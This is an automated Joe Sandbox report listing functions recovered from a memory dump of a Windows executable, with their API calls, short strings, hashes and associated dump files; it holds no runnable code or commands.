Opcode ID: 76a7ad52059c50e30333016b64763ffb75e7c988e5bdcce76917e3e28b7b6319
Instruction ID: 389d16244cf487f94e4d4cdb914c14ab0c28bd46d18fbed0775dba227793b623
Opcode Fuzzy Hash: 76a7ad52059c50e30333016b64763ffb75e7c988e5bdcce76917e3e28b7b6319
Instruction Fuzzy Hash: C0E01AB4810304DFCF41AFA4D84866EBBB2FB48311F10A409F856EB360C7388902EF60

Function 00DAD86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00DAD86C
GetDC.USER32(00000000), ref: 00DAD876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00DAD882
ReleaseDC.USER32(?), ref: 00DAD8A3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 99aec78612df5bda32b45fa7dd61d98b73739fd677c8ea571430e7d8638b8f43
Instruction ID: b3b4bc9bdd048245ef60ce30d9ace78d59275659d3361552f83ebf339426e144
Opcode Fuzzy Hash: 99aec78612df5bda32b45fa7dd61d98b73739fd677c8ea571430e7d8638b8f43
Instruction Fuzzy Hash: F5E01A74C10300DFCF41AFA4D84866EBBB1FB48311B10A408F856EB360C73859029F60

Function 00DC4D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00D57620: _wcslen.LIBCMT ref: 00D57625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00DC4ED4

Strings

*, xrefs: 00DC4E10
LPT, xrefs: 00DC4DFB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 696d0bfd0ef38b648a0a5fcc2670586509b922494664a874351f0d6bda3d133d
Instruction ID: 17e6c5b61a6a6f6eff1eb69f79304c6eb0bf1c7bf1c3a379438aeb805633a7c1
Opcode Fuzzy Hash: 696d0bfd0ef38b648a0a5fcc2670586509b922494664a874351f0d6bda3d133d
Instruction Fuzzy Hash: 71914A75A002059FDB14DF58C494EAABBF5AF44304F19809DE84A9B3A2D731ED85CBB0

Function 00D7E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00D7E30D

Strings

pow, xrefs: 00D7E2E5, 00D7E302

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 8dd3c76b0e002c1e352db1bd62989f832798a836db5ae7c5173989c47dfac02f
Instruction ID: 1e77e1b39492bb96bf9da39e6700ccbfb7a0ffcda414986a604ee03cd74449cb
Opcode Fuzzy Hash: 8dd3c76b0e002c1e352db1bd62989f832798a836db5ae7c5173989c47dfac02f
Instruction Fuzzy Hash: 10512661A0C202D6CB167714C94137A3BA4EF44741F38C9D8F0D9832A9FB35CC959BB6

Function 00DD7771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00DA569E,00000000,?,00DECC08,?,00000000,00000000), ref: 00DD78DD

Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A

CharUpperBuffW.USER32(00DA569E,00000000,?,00DECC08,00000000,?,00000000,00000000), ref: 00DD783B

Strings

<s, xrefs: 00DD790C, 00DD790F, 00DD7924

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s
API String ID: 3544283678-2940880691
Opcode ID: 9ceb7b3933b6653b297d0fb888fd86bcf5b6a5c57c6db3d051b43ec3071d12cc
Instruction ID: c4c66dc97b03bc7b45efeb32723ce005fdcff47deb77f6d6ff6a59af96cb3672
Opcode Fuzzy Hash: 9ceb7b3933b6653b297d0fb888fd86bcf5b6a5c57c6db3d051b43ec3071d12cc
Instruction Fuzzy Hash: 5E614F32914118AACF04EBA4CCA1DFDB374FF24701B54456AED42A7191FF349A49DBB0

Function 00D6E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 00D6E1B1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 8d51871ad636c31f017a2a19f299488046c51ea6c4b825cee51dc9142907bf85
Instruction ID: 5fccd80f7341e333c7b36e04ea09dc8647669dfc7bc475fb28080da5b5e1c1a1
Opcode Fuzzy Hash: 8d51871ad636c31f017a2a19f299488046c51ea6c4b825cee51dc9142907bf85
Instruction Fuzzy Hash: 11512279900246DFDF19DF28C4916BA7BA5EF6A310F284059EC919B2D0DB34DD46CBB0

Function 00D6F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00D6F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 00D6F2BB

Strings

@, xrefs: 00D6F2AF

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cc77fa1863b36df1d7ce9fbfaefcb87ee92c4114f35e1a030b409fd8c902e728
Instruction ID: 4eff8aeb6ff1677d4751dcbc67f20a74975cd789eb8bb6f25bff125f361fd867
Opcode Fuzzy Hash: cc77fa1863b36df1d7ce9fbfaefcb87ee92c4114f35e1a030b409fd8c902e728
Instruction Fuzzy Hash: 2A5133714187849BD320AF14EC86BAFBBF8FF94301F81884CF9D9511A5EB318569CB66

Function 00DD5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00DD57E0
_wcslen.LIBCMT ref: 00DD57EC

Strings

CALLARGARRAY, xrefs: 00DD57E6, 00DD57EB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 4697848212ecaa03a5f5166c38fdb42ebe5e1926329dded2c273971a1f4ece0c
Instruction ID: 3c7e3dbccd582d0e495c727b3a3bfcb0b18ab059436ab029f2609c944591c926
Opcode Fuzzy Hash: 4697848212ecaa03a5f5166c38fdb42ebe5e1926329dded2c273971a1f4ece0c
Instruction Fuzzy Hash: 8641A031A00209DFCB14DFA9D8818AEBBB5FF59324F24406AE506A7355E7309D81DBB0

Function 00DCD0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00DCD130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00DCD13A

Strings

|, xrefs: 00DCD10B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: be2eb29db61c95e6c81852253bcf3624f512b7513a664b544c2c7f8e43054209
Instruction ID: bc41478a9ef44fc2098618347f37cb26c76ae71f2f6f8e54d39b7be2e31bce56
Opcode Fuzzy Hash: be2eb29db61c95e6c81852253bcf3624f512b7513a664b544c2c7f8e43054209
Instruction Fuzzy Hash: 8B31D771901219ABCF15AFA4CC85AEEBFBAFF04300F144029F819A6165E631AA56DB70

Function 00DE356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00DE3621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00DE365C

Strings

static, xrefs: 00DE35BC

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c6e99c5eb6c919c424cbc9fb567c085c95af9f3aa4a4b11311b217897a41585a
Instruction ID: 76c482d9b616f53aca4db37cda004337f0a414b07ddaa82a759def61fc22f75a
Opcode Fuzzy Hash: c6e99c5eb6c919c424cbc9fb567c085c95af9f3aa4a4b11311b217897a41585a
Instruction Fuzzy Hash: 6E31AD71110684AEDB14AF39CC84EBB73A9FF88720F00961DF8A5D7290DA30AD81D770

Function 00DE4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00DE461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DE4634

Strings

', xrefs: 00DE458E

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: af1ae848bf87c610857a3ac3a4767930f45c54c3f3cfbb562649a560904b5688
Instruction ID: 64cf11340bb669dbaf04d1016bcc5fe42aae1fecc96205386ba61235e29ca4f6
Opcode Fuzzy Hash: af1ae848bf87c610857a3ac3a4767930f45c54c3f3cfbb562649a560904b5688
Instruction Fuzzy Hash: E9310774A013599FDB14DFAAC990BDABBB5FF49300F14406AE905AB391D770A941CFA0

Function 00DE31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DE327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00DE3287

Strings

Combobox, xrefs: 00DE3249

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: d8f21d07d349cb0f8785b3198f78792f16491ff1274bfd0c28475e52d7e18e37
Instruction ID: decfae717b79807dab4a3c1e1e8e756fb77d3e2a0c7a56b50628ad6c59f567ab
Opcode Fuzzy Hash: d8f21d07d349cb0f8785b3198f78792f16491ff1274bfd0c28475e52d7e18e37
Instruction Fuzzy Hash: 0D11E2713002487FEF25AE55DC88EBB37AAEB94364F140128FA58AB290D631DD518774

Function 00DE3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00D5600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00D5604C
Part of subcall function 00D5600E: GetStockObject.GDI32(00000011), ref: 00D56060
Part of subcall function 00D5600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D5606A

GetWindowRect.USER32(00000000,?), ref: 00DE377A
GetSysColor.USER32(00000012), ref: 00DE3794

Strings

static, xrefs: 00DE3757

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 142829a0429874bd0113eafb4fc13ab0aab644642edfc3a1cce86e21bcf9e628
Instruction ID: 16436a17d78328f1f562391f35bb75bce27d5d21d0b1973d434943f35e5a8397
Opcode Fuzzy Hash: 142829a0429874bd0113eafb4fc13ab0aab644642edfc3a1cce86e21bcf9e628
Instruction Fuzzy Hash: F01156B2610249AFDF10EFA8CC4AAFA7BB8EB08314F004924FD55E3250E734E9119B60

Function 00DCCD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DCCD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DCCDA6

Strings

<local>, xrefs: 00DCCD66

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: f43949473f4f5d2e139e4b6e59d29d6124bba5d42250b7c3c0aec01b0304bf50
Instruction ID: 4b8a0e1adba8d537a404c0372b1a3bd3f6d70bbde230a88e2c8fb4a28a7f6ba6
Opcode Fuzzy Hash: f43949473f4f5d2e139e4b6e59d29d6124bba5d42250b7c3c0aec01b0304bf50
Instruction Fuzzy Hash: 1011E371621633BAD7345A668C84FE3BE68EB127A4F00522AF24E83180D2709841D6F0

Function 00DE3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00DE34AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DE34BA

Strings

edit, xrefs: 00DE348F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 463113b0fdf6ca9a9586681fe0248dc3910ac23132617ca9440f982856116039
Instruction ID: d4da44a177282265b9b0e1a075cc80b11e2dc863ca886981921be9c306e3c485
Opcode Fuzzy Hash: 463113b0fdf6ca9a9586681fe0248dc3910ac23132617ca9440f982856116039
Instruction Fuzzy Hash: CE11BF71100288AFEB126E66DC88ABB376AEB05374F904324F965D71E0C731DD519B70

Function 00DB6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

CharUpperBuffW.USER32(?,?,?), ref: 00DB6CB6
_wcslen.LIBCMT ref: 00DB6CC2

Strings

STOP, xrefs: 00DB6CBC, 00DB6CC1

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 2cafcc0c993f58fddfc637f138636fd306f5e79400e44aa8960a3e748a5895ce
Instruction ID: 48fb1507faed3d595054b151ab69053a1b2a5949d3a91f5d7d7d82ef278148cd
Opcode Fuzzy Hash: 2cafcc0c993f58fddfc637f138636fd306f5e79400e44aa8960a3e748a5895ce
Instruction Fuzzy Hash: 80010432A00526CBCB20AFBDCC918FF7BA5EA607107440928E85396190EB39D844C670

Function 00DB1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DB1D4C

Strings

ListBox, xrefs: 00DB1D16
ComboBox, xrefs: 00DB1CEB

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: e6831ac2f8aca19466e6b0e118fa9972080ca9809269b50fe5217f47f8781da7
Instruction ID: 7bcf0fec1541c5451685cb757b3df35106ab570d37800f1fc628d6498ead3c9f
Opcode Fuzzy Hash: e6831ac2f8aca19466e6b0e118fa9972080ca9809269b50fe5217f47f8781da7
Instruction Fuzzy Hash: 8C01D479601218EB8F18EBA4CC61CFEB7A9EB56350B540A19FC63673D1EA30991C8670

Function 00DB1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00DB1C46

Strings

ListBox, xrefs: 00DB1C10
ComboBox, xrefs: 00DB1BE5

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 8f667e99ff654988019612e587a5cfcc6c08a13222f0de83c4249e146e718271
Instruction ID: 20ffd8aa884f2a70ad922ded485a7a1f27a4dcc19968b14d3af91760c7c9516a
Opcode Fuzzy Hash: 8f667e99ff654988019612e587a5cfcc6c08a13222f0de83c4249e146e718271
Instruction Fuzzy Hash: 34016779681204E6CF14EB90C962DFFBBA9DB55340F540419AC5777282EA309E1C96B1

Function 00DB1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00DB3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DB3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 00DB1CC8

Strings

ListBox, xrefs: 00DB1C94
ComboBox, xrefs: 00DB1C69

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: b81e27b530cff030fc3d802787f8e58f578774b86802ba8b2df7e376e4361447
Instruction ID: 12da372de9f9a7aee8866be304d72d9624a311ff864793dc04e44da413e4c5c7
Opcode Fuzzy Hash: b81e27b530cff030fc3d802787f8e58f578774b86802ba8b2df7e376e4361447
